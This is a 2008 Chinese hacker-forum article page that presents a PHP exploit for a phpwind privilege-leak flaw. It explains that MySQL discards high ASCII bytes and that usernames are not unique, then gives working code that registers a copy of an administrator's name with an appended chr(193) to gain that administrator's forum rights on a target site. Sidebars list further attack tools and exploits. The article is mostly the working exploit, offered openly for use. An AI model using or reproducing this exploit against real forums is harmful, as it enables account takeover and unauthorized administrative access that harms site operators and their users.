黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑软介绍 >> 正文
·phpwind管理权限泄露漏洞06-04·关于phpwind克隆用户06-04
·SQL注入攻击-来自微软安06-04·Windows Server 2008下 06-04
·免格式化制作移动硬盘恢06-04·Vista磁盘碎片整理亲历记06-04
·巧用组策略加固你的操作06-04·RTG(亚洲)网络提供200M/06-04
·Vista下上网冲浪与众不同06-02·微调Web站点以适应XP SP06-02
·安装Vista SP1后遇到声音06-02·在XP和Windows Server 206-02
·第一主机提供CN免费域名06-02·超级主机提供200M/FTP免06-02
·企业服务器 SQL Server弱06-01·3389任意密码登陆(vb源码06-01
·Dvbbs8.2 access/sql 版06-01·dvbbs 8.2 SQL注射漏洞分06-01
·网络嗅探器SniffX使用说06-01·phpwind管理权限泄露漏洞06-01
·免费发彩信的工具06-01·不安装/不修改文件 让XP06-01
·藏再隐秘也没用 高效利用06-01·EveryDNS提供免费域名DN06-01
·ZWRO互联提供500M免费全06-01·对 XP中出现故障服务进行05-30
·让XP和Vista一样拥有动态05-30·让病毒和木马白白运行05-29
[图文]phpwind管理权限泄露漏洞利用程序PHP版
        ★★★★★

phpwind管理权限泄露漏洞利用程序PHP版

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-6-4 16:19:55
昨天发了phpwind管理权限泄露漏洞+利用程序,利用程序是python写的,很多朋友说不会用,今天看到yuehei同学的留言说他重写成PHP的了。

今天发现PW又出漏洞

漏洞原因是Mysql会舍弃没有用处的ASCII129-255,搜了资料也没有找到为什么,PW最大失误不是程序,而是没有把username设为唯一。

可以构造一个和某个管理人员名字一样的ID再加上一个无效的ASCII码进行注册,表中会出现二个一样的用户名,而forums.forumadmin字段里存的用户名,这样就可获得全部的前台权限。

使用PHP构造的测试代码。


以下是引用片段:
<?php
if (empty($_GET['sub'])) {
    print <<<EOT
        <form action=”" method=”get”><br />
        <input type=”text” name=”url” /><br />
        <input type=”text” name=”regname” /><br />
        <input type=”submit” name=”sub” value=”提交” />
        </form>
EOT;
} else {
    extract($_GET);
    $regname .= chr(193);
    $data = array(
        ‘regname’ => $regname,
        ‘regpwd’ => 147852,
        ‘regpwdrepeat’ => 147852,
        ‘regemail’ => ‘llll@Ll.com’,
        ‘regemailtoall’ => 1,
        ’step’ => 2
    );    

    $url .= ‘/register.php’;
    $includePath = ini_get(’include_path’);
    $includePath .=’;D:\www\pear’;
    ini_set(’include_path’, $includePath);
    include(’HTTP/Client.php’);
    $http = new HTTP_Client();
    var_dump($http->post($url, $data));
}

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    强悍挂马工具:IIS_AD IIS扩展(附05-04
    Real Player rmoc3260.dll Activ04-04
    Real Player rmoc3260.dll Activ04-03
    Pangolin号称很牛的注入工具03-25
    仿FirePack网马管理系统fsploit03-01
    机器狗生成器02-26
    Serv-U 6.X 提权脚本01-31
    入侵工具Knark的分析及防范01-14
    如何使用Nikto漏洞扫描工具检测网12-21
    十三WEBSHELL终结版后门的去除过12-14
    hijack(红狼安全小组原创作品 - 11-29
    高级内网渗透工具:Paris (创建VP11-01
    相 关 文 章
    关于phpwind克隆用户
    phpwind管理权限泄露漏洞+利用程序
    PHPWind超级漏洞简单用
    分析phpwind漏洞
    phpwind的一个放后门的方式
    PHPWind-附件文件名跨站脚本漏洞
    phpwind、DZ论坛XSS跨站漏洞0DAY
    PhpWind 防盗链插件Showpic.php本地读文
    轻易绕过PhpWind论坛程序高危漏洞攻防详
    phpwind 从后台拿webshell的三种方式
    关于phpwind 5.01-5.3 0day的分析
    [0day]PHPWind 5.x Exploits GUI版+命令
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886